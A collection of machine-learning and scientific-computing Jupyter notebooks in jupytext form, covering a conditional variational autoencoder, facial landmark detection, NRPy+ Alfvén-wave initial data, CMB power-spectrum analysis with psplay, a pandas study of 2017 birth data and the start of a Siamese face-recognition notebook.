def decode_img(a):
a = np.clip(a * 256, 0, 255).astype('uint8')
return PIL.Image.fromarray(a)
decode_img(decoder.predict(random_number).reshape(img_width, img_height)).resize((56, 56))
# +
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
vec = np.zeros((1, latent_space_depth))
for x in range(num_cells):
vec[:, 0] = (x * 3) / (num_cells - 1) - 1.5
for y in range(num_cells):
vec[:, 1] = (y * 3) / (num_cells - 1) - 1.5
decoded = decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# +
def ConditionalVariationalAutoEncoder(num_pixels, num_labels):
pixels = Input(shape=(num_pixels,))
label = Input(shape=(num_labels,), name='label')
inputs = concat([pixels, label], name='inputs')
encoder_hidden = Dense(512, activation='relu', name='encoder_hidden')(inputs)
z_mean = Dense(latent_space_depth, activation='linear')(encoder_hidden)
z_log_var = Dense(latent_space_depth, activation='linear')(encoder_hidden)
def KL_loss(y_true, y_pred):
return(0.5 * K.sum(K.exp(z_log_var) + K.square(z_mean) - 1 - z_log_var, axis=1))
def reconstruction_loss(y_true, y_pred):
return K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)
def total_loss(y_true, y_pred):
return KL_loss(y_true, y_pred) + reconstruction_loss(y_true, y_pred)
z = Lambda(sample_z, output_shape=(latent_space_depth, ))([z_mean, z_log_var])
zc = concat([z, label])
decoder_hidden = Dense(512, activation='relu')
reconstruct_pixels = Dense(num_pixels, activation='sigmoid')
decoder_in = Input(shape=(latent_space_depth + num_labels,))
hidden = decoder_hidden(decoder_in)
decoder_out = reconstruct_pixels(hidden)
decoder = Model(decoder_in, decoder_out)
hidden = decoder_hidden(zc)
outputs = reconstruct_pixels(hidden)
auto_encoder = Model([pixels, label], outputs)
auto_encoder.compile(optimizer=Adam(lr=0.001),
loss=total_loss,
metrics=[KL_loss, reconstruction_loss])
return auto_encoder, decoder
cond_auto_encoder, cond_decoder = ConditionalVariationalAutoEncoder(x_train.shape[1], y_train.shape[1])
cond_auto_encoder.summary()
# -
cond_auto_encoder.fit([x_train, y_train], x_train, verbose=1,
batch_size=batch_size, epochs=50,
validation_data = ([x_test, y_test], x_test))
number_4 = np.zeros((1, latent_space_depth + y_train.shape[1]))
number_4[:, 4 + latent_space_depth] = 1
decode_img(cond_decoder.predict(number_4).reshape(
img_width, img_height)).resize((56, 56))
number_8_3 = np.zeros((1, latent_space_depth + y_train.shape[1]))
number_8_3[:, 8 + latent_space_depth] = 0.5
number_8_3[:, 3 + latent_space_depth] = 0.5
decode_img(cond_decoder.predict(number_8_3).reshape(
img_width, img_height)).resize((56, 56))
# +
digits = [3, 0, 8, 9]
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
for x in range(num_cells):
x1 = [x / (num_cells - 1), 1 - x / (num_cells - 1)]
for y in range(num_cells):
y1 = [y / (num_cells - 1), 1 - y / (num_cells - 1)]
for idx, dig in enumerate(digits):
vec[:, dig + latent_space_depth] = x1[idx % 2] * y1[idx // 2]
decoded = cond_decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# +
num_cells = 10
overview = PIL.Image.new('RGB',
(num_cells * (img_width + 4) + 8,
num_cells * (img_height + 4) + 8),
(128, 128, 128))
img_it = 0
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
for x in range(num_cells):
vec = np.zeros((1, latent_space_depth + y_train.shape[1]))
vec[:, x + latent_space_depth] = 1
for y in range(num_cells):
vec[:, 1] = 3 * y / (num_cells - 1) - 1.5
decoded = cond_decoder.predict(vec)
img = decode_img(decoded.reshape(img_width, img_height))
overview.paste(img, (x * (img_width + 4) + 6, y * (img_height + 4) + 6))
overview
# -
| 13.2 Variational Autoencoder.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Facial Landmarks
# -
# See blog post here - https://matthewearl.github.io/2015/07/28/switching-eds-with-python/
#
#
# #### Install Instructions for dlib
#
# - Download and Install Dlib
#
# https://sourceforge.net/projects/dclib/
#
# - Extract files in C:/dlib
# - Use the command prompt to `cd` to the folder and run `python setup.py install`
#
# #### Download the pre-trained model here
#
# http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
#
# - Place this file in your default ipython notebook folder
#
# +
import cv2
import dlib
import numpy
PREDICTOR_PATH = "shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(PREDICTOR_PATH)
detector = dlib.get_frontal_face_detector()
class TooManyFaces(Exception):
pass
class NoFaces(Exception):
pass
def get_landmarks(im):
rects = detector(im, 1)
if len(rects) > 1:
raise TooManyFaces
if len(rects) == 0:
raise NoFaces
return numpy.matrix([[p.x, p.y] for p in predictor(im, rects[0]).parts()])
def annotate_landmarks(im, landmarks):
im = im.copy()
for idx, point in enumerate(landmarks):
pos = (point[0, 0], point[0, 1])
cv2.putText(im, str(idx), pos,
fontFace=cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,
fontScale=0.4,
color=(0, 0, 255))
cv2.circle(im, pos, 3, color=(0, 255, 255))
return im
image = cv2.imread('Obama.jpg')
landmarks = get_landmarks(image)
image_with_landmarks = annotate_landmarks(image, landmarks)
cv2.imshow('Result', image_with_landmarks)
cv2.imwrite('image_with_landmarks.jpg',image_with_landmarks)
cv2.waitKey(0)
cv2.destroyAllWindows()
# -
| LECTURES/Lecture 7.1 - Facial Landmarks.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # 1D Three Wave `GiRaFFEfood` Initial Data for `GiRaFFE`
#
# ## This module provides another initial data option for `GiRaFFE`, drawn from [this paper](https://arxiv.org/abs/1310.3274).
#
# **Notebook Status:** <font color='green'><b> Validated </b></font>
#
# **Validation Notes:** This tutorial notebook has been confirmed to be self-consistent with its corresponding NRPy+ module, as documented [below](#code_validation). The initial data has validated against the original `GiRaFFE`, as documented [here](Tutorial-Start_to_Finish_UnitTest-GiRaFFEfood_NRPy.ipynb).
#
# ### NRPy+ Source Code for this module: [GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests_three_waves.py](../../edit/in_progress/GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests_three_waves.py)
#
# ## Introduction:
#
# ### Three waves:
#
# This is a flat-spacetime test representing three Alfvén waves (one stationary, one left-going, and one right-going) with initial data
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
# where $H(x)$ is the Heaviside function, which generates the magnetic field
# $$\mathbf{B}(0,x) = \mathbf{B_a}(0,x) + \mathbf{B_+}(0,x) + \mathbf{B_-}(0,x)$$
# and uses the electric field
# $$\mathbf{E}(0,x) = \mathbf{E_a}(0,x) + \mathbf{E_+}(0,x) + \mathbf{E_-}(0,x),$$
# where subscripted $\mathbf{a}$ corresponds to the stationary wave, subscripted $\mathbf{+}$ corresponds to the right-going wave, and subscripted $\mathbf{-}$ corresponds to the left-going wave, and where
# \begin{align}
# \mathbf{B_a}(0,x) &= \left \{ \begin{array}{lll} (1.0,1.0,2.0) & \mbox{if} & x<0 \\
# (1.0,1.5,2.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_a}(0,x) &= \left \{ \begin{array}{lll} (-1.0,1.0,0.0) & \mbox{if} & x<0 \\
# (-1.5,1.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x<0 \\
# (0.0,1.5,1.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x<0 \\
# (0.0,1.0,-1.5) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.5,1.5) & \mbox{if} & x<0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,-1.5,0.5) & \mbox{if} & x<0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. . \\
# \end{align}
#
# For the eventual purpose of testing convergence, any quantity $Q$ evolves as $Q(t,x) = Q_a(0,x) + Q_+(0,x-t) + Q_-(0,x+t)$.
#
# See the [Tutorial-GiRaFFEfood_NRPy_Exact_Wald](Tutorial-GiRaFFEfood_NRPy.ipynb) tutorial notebook for more general detail on how this is used.
#
# <a id='toc'></a>
#
# # Table of Contents:
# $$\label{toc}$$
#
# This notebook is organized as follows
#
# 1. [Step 1](#initializenrpy): Import core NRPy+ modules and set NRPy+ parameters
# 1. [Step 2](#vector_ak): Set the vector $A_k$
# 1. [Step 3](#vectors_for_velocity): Set the vectors $B^i$ and $E^i$ for the velocity
# 1. [Step 4](#vi): Calculate $v^i$
# 1. [Step 5](#code_validation): Code Validation against `GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests` NRPy+ module
# 1. [Step 6](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
# <a id='initializenrpy'></a>
#
# # Step 1: Import core NRPy+ modules and set NRPy+ parameters \[Back to [top](#toc)\]
# $$\label{initializenrpy}$$
#
# Here, we will import the NRPy+ core modules and set the reference metric to Cartesian, set commonly used NRPy+ parameters, and set C parameters that will be set from outside the code eventually generated from these expressions. We will also set up a parameter to determine what initial data is set up, although it won't do much yet.
# +
# Step 0: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
# Step 0.a: Import the NRPy+ core modules and set the reference metric to Cartesian
import sympy as sp # SymPy: The Python computer algebra package upon which NRPy+ depends
import NRPy_param_funcs as par # NRPy+: Parameter interface
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import reference_metric as rfm # NRPy+: Reference metric support
par.set_parval_from_str("reference_metric::CoordSystem","Cartesian")
rfm.reference_metric()
# Step 1a: Set commonly used parameters.
thismodule = "GiRaFFEfood_NRPy_1D"
# -
# ##### <a id='vector_ak'></a>
#
# # Step 2: Set the vector $A_k$ \[Back to [top](#toc)\]
# $$\label{vector_ak}$$
#
# The vector potential is given as
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
#
# However, to take full advantage of NRPy+'s automated function generation capabilities, we want to write this without the `if` statements, replacing them with calls to `fabs()`. To do so, we will use the NRPy+ module `Min_Max_and_Piecewise_Expressions`.
# We'll use reference_metric.py to define x and y
x = rfm.xxCart[0]
y = rfm.xxCart[1]
# Now, we can define the vector potential. We will need to write the Heaviside function without `if`s, which can easily be done with the module `Min_Max_and_Piecewise_Expressions`. We thus get
# $$H(x) = \frac{\max(0,x)}{x}.$$
# This implementation is, of course, undefined for $x=0$; this problem is easily solved by adding a very small number (called `TINYDOUBLE` in our implementation) to the denominator (see [Tutorial-Min_Max_and_Piecewise_Expressions](Tutorial-Min_Max_and_Piecewise_Expressions.ipynb) for details on how this works). This is, conveniently, the exact implementation of the `coord_greater_bound()` function!
#
# \begin{align}
# A_x &= 0 \\
# A_y &= 3.5x H(-x) + 3.0x H(x) \\
# A_z &= y - 1.5x H(-x) - 3.0x H(x),
# \end{align}
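# As a quick standalone NumPy illustration of this branch-free Heaviside trick (the `TINYDOUBLE` value below is just a stand-in for the NRPy+ parameter):

```python
import numpy as np

TINYDOUBLE = 1e-100  # stand-in for the NRPy+ TINYDOUBLE parameter

def heaviside(x):
    # H(x) = max(0, x) / (x + TINYDOUBLE), with no if statements
    return np.maximum(0.0, x) / (x + TINYDOUBLE)

print(np.abs(heaviside(np.array([-2.0, 3.0]))))  # [0. 1.]
```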
# +
AD = ixp.zerorank1(DIM=3)
import Min_Max_and_Piecewise_Expressions as noif
AD[0] = sp.sympify(0)
AD[1] = sp.Rational(7,2)*x*noif.coord_greater_bound(-x,0) + sp.sympify(3)*x*noif.coord_greater_bound(x,0)
AD[2] = y-sp.Rational(3,2)*x*noif.coord_greater_bound(-x,0) - sp.sympify(3)*x*noif.coord_greater_bound(x,0)
# -
# <a id='vectors_for_velocity'></a>
#
# # Step 3: Set the vectors $B^i$ and $E^i$ for the velocity \[Back to [top](#toc)\]
# $$\label{vectors_for_velocity}$$
#
# First, we will set the three individual waves; we change all $<$ to $\leq$ to avoid unintended behavior at $x=0$:
# \begin{align}
# \mathbf{B_a}(0,x) &= \left \{ \begin{array}{lll} (1.0,1.0,2.0) & \mbox{if} & x \leq 0 \\
# (1.0,1.5,2.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_a}(0,x) &= \left \{ \begin{array}{lll} (-1.0,1.0,0.0) & \mbox{if} & x \leq 0 \\
# (-1.5,1.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x \leq 0 \\
# (0.0,1.5,1.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_+}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.0,0.0) & \mbox{if} & x \leq 0 \\
# (0.0,1.0,-1.5) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{B_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,0.5,1.5) & \mbox{if} & x \leq 0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. , \\
# \mathbf{E_-}(0,x) &= \left \{ \begin{array}{lll} (0.0,-1.5,0.5) & \mbox{if} & x \leq 0 \\
# (0.0,0.0,0.0) & \mbox{if} & x>0 \end{array}
# \right. . \\
# \end{align}
#
# +
B_aU = ixp.zerorank1(DIM=3)
E_aU = ixp.zerorank1(DIM=3)
B_pU = ixp.zerorank1(DIM=3)
E_pU = ixp.zerorank1(DIM=3)
B_mU = ixp.zerorank1(DIM=3)
E_mU = ixp.zerorank1(DIM=3)
B_aU[0] = sp.sympify(1)
B_aU[1] = noif.coord_leq_bound(x,0) * sp.sympify(1) + noif.coord_greater_bound(x,0) * sp.Rational(3,2)
B_aU[2] = sp.sympify(2)
E_aU[0] = noif.coord_leq_bound(x,0) * sp.sympify(-1) + noif.coord_greater_bound(x,0) * sp.Rational(-3,2)
E_aU[1] = sp.sympify(1)
E_aU[2] = sp.sympify(0)
B_pU[0] = sp.sympify(0)
B_pU[1] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.Rational(3,2)
B_pU[2] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.sympify(1)
E_pU[0] = sp.sympify(0)
E_pU[1] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.sympify(1)
E_pU[2] = noif.coord_leq_bound(x,0) * sp.sympify(0) + noif.coord_greater_bound(x,0) * sp.Rational(-3,2)
B_mU[0] = sp.sympify(0)
B_mU[1] = noif.coord_leq_bound(x,0) * sp.Rational(1,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
B_mU[2] = noif.coord_leq_bound(x,0) * sp.Rational(3,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
E_mU[0] = sp.sympify(0)
E_mU[1] = noif.coord_leq_bound(x,0) * sp.Rational(-3,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
E_mU[2] = noif.coord_leq_bound(x,0) * sp.Rational(1,2) + noif.coord_greater_bound(x,0) * sp.sympify(0)
# -
# Then, we can obtain the total expressions for the magnetic and electric fields by simply adding the three waves together:
# \begin{align}
# \mathbf{B}(0,x) &= \mathbf{B_a}(0,x) + \mathbf{B_+}(0,x) + \mathbf{B_-}(0,x) \\
# \mathbf{E}(0,x) &= \mathbf{E_a}(0,x) + \mathbf{E_+}(0,x) + \mathbf{E_-}(0,x)
# \end{align}
BU = ixp.zerorank1(DIM=3)
EU = ixp.zerorank1(DIM=3)
for i in range(3):
BU[i] = B_aU[i] + B_pU[i] + B_mU[i]
EU[i] = E_aU[i] + E_pU[i] + E_mU[i]
# <a id='vi'></a>
#
# # Step 4: Calculate $v^i$ \[Back to [top](#toc)\]
# $$\label{vi}$$
#
# Now, we calculate $$\mathbf{v} = \frac{\mathbf{E} \times \mathbf{B}}{B^2},$$ which is equivalent to $$v^i = [ijk] \frac{E^j B^k}{B^2},$$ where $[ijk]$ is the Levi-Civita symbol and $B^2 = \gamma_{ij} B^i B^j$ is a trivial dot product in flat space.
#
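# A standalone NumPy sketch of this drift velocity formula on made-up field values (not the fields above): with $\mathbf{E} = (0,1,0)$ and $\mathbf{B} = (0,0,2)$, we get $\mathbf{v} = \mathbf{E}\times\mathbf{B}/B^2 = (0.5, 0, 0)$.

```python
import numpy as np

E = np.array([0.0, 1.0, 0.0])
B = np.array([0.0, 0.0, 2.0])
v = np.cross(E, B) / np.dot(B, B)  # E x B / B^2, flat-space dot product
print(v.tolist())  # [0.5, 0.0, 0.0]
```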
# +
LeviCivitaSymbolDDD = ixp.LeviCivitaSymbol_dim3_rank3()
B2 = sp.sympify(0)
for i in range(3):
# In flat spacetime, gamma_{ij} is just a Kronecker delta
B2 += BU[i]**2 # This is trivial to extend to curved spacetime
ValenciavU = ixp.zerorank1()
for i in range(3):
for j in range(3):
for k in range(3):
ValenciavU[i] += LeviCivitaSymbolDDD[i][j][k] * EU[j] * BU[k] / B2
# -
# <a id='code_validation'></a>
#
# # Step 5: Code Validation against `GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests` NRPy+ module \[Back to [top](#toc)\]
# $$\label{code_validation}$$
#
# Here, as a code validation check, we verify agreement in the SymPy expressions for the `GiRaFFE` Aligned Rotator initial data equations we intend to use between
# 1. this tutorial and
# 2. the NRPy+ [`GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests.py`](../edit/GiRaFFEfood_NRPy/GiRaFFEfood_NRPy_1D_tests.py) module.
#
#
# +
import GiRaFFEfood_NRPy.GiRaFFEfood_NRPy_1D_tests_three_waves as gfho
gfho.GiRaFFEfood_NRPy_1D_tests_three_waves()
def consistency_check(quantity1,quantity2,string):
if quantity1-quantity2==0:
print(string+" is in agreement!")
else:
print(string+" does not agree!")
sys.exit(1)
print("Consistency check between GiRaFFEfood_NRPy tutorial and NRPy+ module:")
for i in range(3):
consistency_check(ValenciavU[i],gfho.ValenciavU[i],"ValenciavU"+str(i))
consistency_check(AD[i],gfho.AD[i],"AD"+str(i))
# -
# <a id='latex_pdf_output'></a>
#
# # Step 6: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-GiRaFFEfood_NRPy_1D_tests.pdf](Tutorial-GiRaFFEfood_NRPy_1D_tests.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
import cmdline_helper as cmd # NRPy+: Multi-platform Python command-line interface
cmd.output_Jupyter_notebook_to_LaTeXed_PDF("Tutorial-GiRaFFEfood_NRPy_1D_tests",location_of_template_file=os.path.join(".."))
| in_progress/Tutorial-GiRaFFEfood_NRPy_1D_tests-three_waves.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # From CMB simulations to power spectra analysis
#
# In this tutorial, we will show how to generate CMB simulations from theoretical $C_\ell$, produce the corresponding CMB map tiles and finally analyze them using `psplay`.
#
# ## CMB simulation
#
# Using the attached $C_\ell$ [file](bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat), we will first generate simulations with `pspy` in `CAR` pixellisation.
# +
from pspy import so_map
ncomp= 3
ra0, ra1, dec0, dec1 = -30, 30, -30, 30
res = 0.5
template = so_map.car_template(ncomp, ra0, ra1, dec0, dec1, res)
cl_file = "bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat"
cmb = template.synfast(cl_file)
# -
# Then, we make 2 splits out of it, each with $5$ µK.arcmin rms in temperature and $5\times\sqrt{2}$ µK.arcmin in polarisation
import numpy as np
nsplits = 2
splits = [cmb.copy() for i in range(nsplits)]
for i in range(nsplits):
noise = so_map.white_noise(cmb, rms_uKarcmin_T=5, rms_uKarcmin_pol=np.sqrt(2)*5)
splits[i].data += noise.data
# We finally write on disk the two corresponding `fits` files
for i in range(nsplits):
    splits[i].write_map("split{}_IQU_car.fits".format(i))
# ## Generation of tile files
#
# We now have a total of 6 maps in `CAR` pixellisation that we want to convert into tile files. A tile file corresponds to a static `PNG` file representing a part of the sky at a given zoom level. To convert the maps, we will use a set of tools from `psplay`.
#
#
# ### Conversion to tile files
# You should get two files of ~1 GB each. We should keep these files since we will use them later for the power spectra computation. As the last step in the conversion process, we have to generate the different tiles
# +
from psplay import tools
for i in range(nsplits):
tools.car2tiles(input_file="split{}_IQU_car.fits".format(i),
output_dir="tiles/split{}_IQU_car.fits".format(i))
# -
# At the end of the process, we get a new directory `tiles` with two sub-directories `split0_IQU_car.fits` and `split1_IQU_car.fits`. Within these two directories we have 6 directories whose names refer to the zoom level: the directory `-5` corresponds to the smallest zoom, whereas the directory `0` corresponds to the most precise tiles.
#
# ## Using `psplay` to visualize the maps
#
# Now that we have generated the different tiles, we can interactively view the maps with `psplay`. The configuration of `psplay` can be done either using a dictionary or, more easily, with a `yaml` file. Basically, the configuration file needs to know where the original `FITS` files and the tile files are located. Other options can be set, but we won't go into too much detail in this tutorial.
#
# For the purpose of this tutorial we have already created the `yaml` [file](simulation_to_analysis.yml) associated to the files we have created so far. Here is a copy-paste of it
#
# ```yaml
# map:
# layers:
# - cmb:
# tags:
# splits:
# values: [0, 1]
# keybindings: [j, k]
#
# components:
# values: [0, 1, 2]
# keybindings: [c, v]
# substitutes: ["T", "Q", "U"]
#
# tile: files/tiles/split{splits}_IQU_car.fits/{z}/tile_{y}_{x}_{components}.png
# name: CMB simulation - split {splits} - {components}
#
# data:
# maps:
# - id: split0
# file: split0_IQU_car.fits
# - id: split1
# file: split1_IQU_car.fits
#
# theory_file: bode_almost_wmap5_lmax_1e4_lensedCls_startAt2.dat
#
# plot:
# lmax: 2000
# ```
#
# There are 3 sections related to the 3 main steps, namely the map visualization, the spectra computation and the graphical representation of the spectra. The first two sections are mandatory. The `map` section corresponds to the tile files generated so far and can be dynamically expanded given different `tags`. Here, for instance, we will build all the combinations of split and component values. The tile and name fields will be generated for each combination given the tag values. Dedicated keybindings can also be defined in order to switch between the different splits and/or components.
#
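# The tag expansion can be pictured with a small standalone sketch (plain `itertools`, not actual `psplay` code):

```python
from itertools import product

splits = [0, 1]
components = ["T", "Q", "U"]
# Every combination of tag values yields one layer name
names = ["CMB simulation - split {} - {}".format(s, c)
         for s, c in product(splits, components)]

print(len(names))  # 6 generated layer names
print(names[0])    # CMB simulation - split 0 - T
```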
# **The trickier part of this configuration is to set the path to the tiles relative to where your notebook/JupyterLab instance has been started.** We can't set an absolute path, so you have to make sure that your notebook has been started from the `examples` directory. Otherwise, you should change the path to the tile files, given that you have access to them from your JupyterLab instance. So make sure to start your JupyterLab session from a "top" directory.
#
# We can now create an instance of `psplay` application and show the different maps
from psplay import App
my_app = App("simulation_to_analysis.yml")
my_app.show_map()
# If we zoom out enough, we will see the $\pm$ 30° patch size. We can also switch between the different I, Q, U and split layers. There are other options, like the colormap and color scale, with which one can play and see how things change.
#
# ## Selecting sub-patches and computing the corresponding power spectra
#
# Given the different maps, we can now select patches by clicking on the square or disk icons located just below the +/- zoom buttons. For instance, if we select a rectangle and a disk whose sizes are more or less the total size of our patch, we will get two surfaces of almost 3000 square degrees. Now we can ask `psplay` to compute the power spectra of both regions. Let's start the plot application
my_app.show_plot()
# We can now click on the `Compute spectra` button and watch the log output by clicking on the `Logs` tab. Depending on your machine (mainly its memory capacity), the process can be pretty long, especially the transformation into spherical harmonics. It also depends on the size of your patches, but within 1 or 2 minutes we should get the final spectra for the different cross-correlations. For instance, we can switch between different combinations of spectra (TT, TE, EE, ...).
#
# Finally, the `Configuration` tab offers different options, like changing the $\ell_\mathrm{max}$ value or the method used for the computation.
| examples/car_simulation_to_analysis.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Importing the libraries
import pandas as pd
# Tell matplotlib to render plots inline
# %matplotlib inline
# +
# Importing some columns from the file
# 0 - year/month  1 - vaginal  2 - cesarean
# Load the csv file, with the separator, the file encoding, and the columns I want
df = pd.read_csv('sinasc122017.csv', sep=';', encoding='cp1252', usecols=[0, 1, 2, 3, 4])
# Display the first rows of the df
df.head()  # Read the beginning
# +
# Renaming the columns
df.columns=['Ano/Mês', 'Parto_Normal', 'Parto_Cesariano', 'Nâo_Informado', 'Total_de_Partos']
# Display the first rows of the df
df.head(12)  # Show the 12 rows
# -
# Describe the numeric columns
df.describe()
# Listing the unique values of total deliveries
df['Total_de_Partos'].unique()  # Unique values
# Counting and sorting the delivery totals
df['Total_de_Partos'].value_counts()
# Plot the chart of total deliveries per month
df['Total_de_Partos'].plot.bar()
# +
# Highlighting the row of the month with the highest number of deliveries
# Creating a subset of the original data
# Creating a new df
df_março = df[df['Ano/Mês'] == 201703]  # not in quotes because it is a number
# Show the df
df_março.head()
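# The filter above uses a boolean mask; a standalone toy example (made-up numbers, independent of the SINASC data) shows the idea:

```python
import pandas as pd

toy = pd.DataFrame({'Ano/Mês': [201702, 201703], 'Total': [10, 20]})
march = toy[toy['Ano/Mês'] == 201703]  # the boolean mask keeps matching rows
print(march['Total'].tolist())  # [20]
```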
# +
# Dropping columns for a better chart visualization
# Dropping year/month (we already know it is March) and the total of deliveries
# df_março receives a new df, which is the same one without those columns
df_março = df_março.drop(columns=['Ano/Mês', 'Total_de_Partos'])
# Show the df
df_março.head()
# -
# Plotting a chart with the quantity of each type of delivery in March
df_março.plot.barh(title='Comparação Entre Os Tipos de Parto')
| Nascimentos/csv_nascimentos_DF_2017.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="-sPL7sGBBrkR" colab_type="text"
# ### author: <EMAIL>
# > One-Shot-Learning with Siamese Network on a small Face dataset
# + id="drrk5tlBA65q" colab_type="code" outputId="6aa3bddd-fcaa-48db-f7b3-ff4056203243" colab={"base_uri": "https://localhost:8080/", "height": 55}
# Load the Drive helper and mount
from google.colab import drive
# This will prompt for authorization.
drive.mount('/content/drive')
# + id="hfMNFh4HBhyc" colab_type="code" outputId="c8e8ff7b-81b8-4a06-dd15-eb4b64e4c8c3" colab={"base_uri": "https://localhost:8080/", "height": 35}
% cd /content/drive/My Drive
# + id="l_FCNi_YCpZ4" colab_type="code" outputId="93f25e2d-b8f1-440c-9a1a-a8af57e60086" colab={"base_uri": "https://localhost:8080/", "height": 35}
import os
print(os.stat('data.zip').st_size/1000000000) # GigaBytes (approx)
# + id="vU5UkmkZCu8n" colab_type="code" colab={}
# unzip to train folder
data_seg = 'data.zip'
import zipfile
zip_ref = zipfile.ZipFile(data_seg, 'r')
zip_ref.extractall('train_face')
zip_ref.close()
# + id="wO_OjVytDFBA" colab_type="code" outputId="70fafe44-2ec1-4527-e321-759f8ef401be" colab={"base_uri": "https://localhost:8080/", "height": 35}
% cd /content/drive/My Drive/train_face/data
# + id="5QIYklcCDG5W" colab_type="code" outputId="efe57bd5-0c16-443b-c6ca-99931b208b9e" colab={"base_uri": "https://localhost:8080/", "height": 35}
# ! ls
# + id="qVNJQCYhDMZ_" colab_type="code" colab={}
# 4 classes for faces of 4 different people
# + id="m5k7_UYJD1yE" colab_type="code" outputId="03a7a5bf-0543-4e33-f69b-a066403ba2fc" colab={"base_uri": "https://localhost:8080/", "height": 350}
import cv2
import matplotlib.pyplot as plt
a = cv2.imread('0/rita0.jpg')
plt.imshow(cv2.resize(a, (100, 150)))
plt.show()
# + id="BOqT6riwmc5U" colab_type="code" outputId="e8ef8e93-4f05-4000-a6f8-567314d3c749" colab={"base_uri": "https://localhost:8080/", "height": 35}
# siamese net
# https://github.com/sorenbouma/keras-oneshot/blob/master/SiameseNet.ipynb
from keras.layers import Input, Conv2D, Lambda, merge, Dense, Flatten,MaxPooling2D, Dropout
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras import backend as K
